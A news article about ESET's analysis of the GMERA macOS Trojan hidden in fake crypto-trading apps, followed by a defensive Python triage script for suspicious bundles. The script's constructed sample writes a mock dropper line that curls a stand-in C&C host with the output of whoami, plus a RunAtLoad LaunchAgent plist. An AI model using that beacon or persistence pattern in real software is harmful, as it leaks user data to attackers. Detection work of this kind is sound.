ESET researchers have identified a new campaign of the GMERA Trojan, which steals cryptocurrency from traders. The malware is distributed under the guise of cryptoasset trading applications for Apple macOS.
Cybersecurity company ESET reported that the malware is bundled into fake cryptocurrency trading applications. Once such an application is installed, it starts stealing digital assets from the user's wallets. The attackers impersonate the Kattana trading platform: they copied the service's website and promote their software under four names: Cointrazer, Cupatrade, Licatrade and Trezarus. GMERA was first detected by the antivirus company Trend Micro in September 2019; at that time it was being distributed as Stockfolio, an app for stock market investing.
ESET explained that a visitor to one of the fake sites downloads a ZIP archive containing a trojanized copy of the application. These copies are fully functional trading clients, and the experts added that for someone who does not already use the genuine Kattana service, the fake sites raise no obvious suspicion. The attackers also use social engineering, contacting potential victims directly. ESET analyzed the malware using Licatrade as its example; the other GMERA builds differ only slightly.
The Trojan drops a shell script bundled with the downloaded application, and that script gives the attackers remote access to the victim's system. It communicates with attacker-controlled command-and-control (C&C) servers over HTTP, through which the operators issue commands to the compromised machine. GMERA collects the user's personal data, information about their cryptocurrency wallets, their location, and screenshots. ESET reported its findings to Apple, which revoked the code-signing certificate used to sign Licatrade the same day.
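The traits described above (a shell script shipped alongside a trading app, an agent that launches it, and plain-HTTP C&C traffic) are the kind of thing an incident responder would look for when triaging a suspicious macOS bundle. The script below is an added example written for this page, not ESET's tooling or anything taken from a real GMERA sample: it walks an `.app` bundle for files with a shell shebang, pulls plaintext `http://` URLs out of them, and checks a LaunchAgents directory for plists pointing into the bundle. The persistence check is an assumption (the article only says the script gives the attackers ongoing access), and the bundle it builds under a temporary directory is constructed purely to have something to scan offline.

```python
"""Triage a macOS .app bundle for a dropped shell script, plain-HTTP C&C
URLs inside it, and LaunchAgent plists that reference the bundle.
Added example for this article; the sample bundle is constructed."""
import os
import re
import plistlib
import tempfile

# Shebangs for sh/bash/zsh, the interpreters a dropped script would use.
SHEBANG_RE = re.compile(rb"^#!\s*/(usr/)?bin/(ba|z|)sh\b")
HTTP_URL_RE = re.compile(rb"https?://[^\s'\"]+")


def find_shell_scripts(app_path):
    """Bundle-relative paths of files that start with a shell shebang.
    The real executable lives in Contents/MacOS as Mach-O; a script-like
    file anywhere in a trading app deserves a second look."""
    hits = []
    for root, _dirs, files in os.walk(app_path):
        for name in files:
            full = os.path.join(root, name)
            try:
                with open(full, "rb") as fh:
                    head = fh.read(64)
            except OSError:
                continue
            if SHEBANG_RE.match(head):
                hits.append(os.path.relpath(full, app_path))
    return sorted(hits)


def plain_http_urls(script_path):
    """Unencrypted http:// URLs in a script: a cheap network indicator."""
    with open(script_path, "rb") as fh:
        data = fh.read()
    return sorted({u.decode(errors="replace") for u in HTTP_URL_RE.findall(data)
                   if u.startswith(b"http://")})


def launch_agents_referencing(agent_dir, app_path):
    """Map plist filename -> program path for LaunchAgents whose Program or
    ProgramArguments point inside the bundle (persistence is an assumption
    here, not something the article states)."""
    refs = {}
    app_real = os.path.realpath(app_path)
    if not os.path.isdir(agent_dir):
        return refs
    for name in os.listdir(agent_dir):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(agent_dir, name), "rb") as fh:
                plist = plistlib.load(fh)
        except Exception:
            continue  # malformed plist: skip rather than crash the triage
        args = list(plist.get("ProgramArguments") or [])
        if plist.get("Program"):
            args.insert(0, plist["Program"])
        for a in args:
            if isinstance(a, str) and os.path.realpath(a).startswith(app_real + os.sep):
                refs[name] = a
                break
    return refs


def triage(app_path, agent_dir):
    """Combine the three checks into one report dict."""
    scripts = find_shell_scripts(app_path)
    report = {"scripts": scripts, "http_urls": {},
              "launch_agents": launch_agents_referencing(agent_dir, app_path)}
    for s in scripts:
        urls = plain_http_urls(os.path.join(app_path, s))
        if urls:
            report["http_urls"][s] = urls
    return report


def build_sample():
    """Constructed bundle mimicking the described layout (not a real sample).
    Returns (app_path, launch_agents_dir) under a fresh temp directory."""
    base = tempfile.mkdtemp()
    app = os.path.join(base, "Licatrade.app")
    os.makedirs(os.path.join(app, "Contents", "MacOS"))
    os.makedirs(os.path.join(app, "Contents", "Resources"))
    with open(os.path.join(app, "Contents", "MacOS", "Licatrade"), "wb") as fh:
        fh.write(b"\xcf\xfa\xed\xfe" + b"\x00" * 60)  # Mach-O magic, placeholder body
    script = os.path.join(app, "Contents", "Resources", "run.sh")
    with open(script, "wb") as fh:
        fh.write(b"#!/bin/sh\n# hypothetical dropper logic\n"
                 b"curl -s http://cc.example.invalid/reg?id=$(whoami)\n")
    agents = os.path.join(base, "LaunchAgents")
    os.makedirs(agents)
    with open(os.path.join(agents, "com.example.agent.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.agent",
                       "ProgramArguments": [script], "RunAtLoad": True}, fh)
    return app, agents


if __name__ == "__main__":
    sample_app, sample_agents = build_sample()
    print(triage(sample_app, sample_agents))
```

On a real Mac, point `triage()` at the downloaded bundle and `~/Library/LaunchAgents`, and pair it with `codesign -dv --verbose=4 <app>` and `spctl --assess --type execute <app>`: since Apple revoked the certificate, a Licatrade build signed with it no longer passes those checks, which is a quick independent confirmation.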
Recall that in April Google removed 49 Chrome browser extensions that posed as utilities for working with cryptocurrency wallets but contained malicious code. Google later removed another 22 extensions that stole cryptocurrency.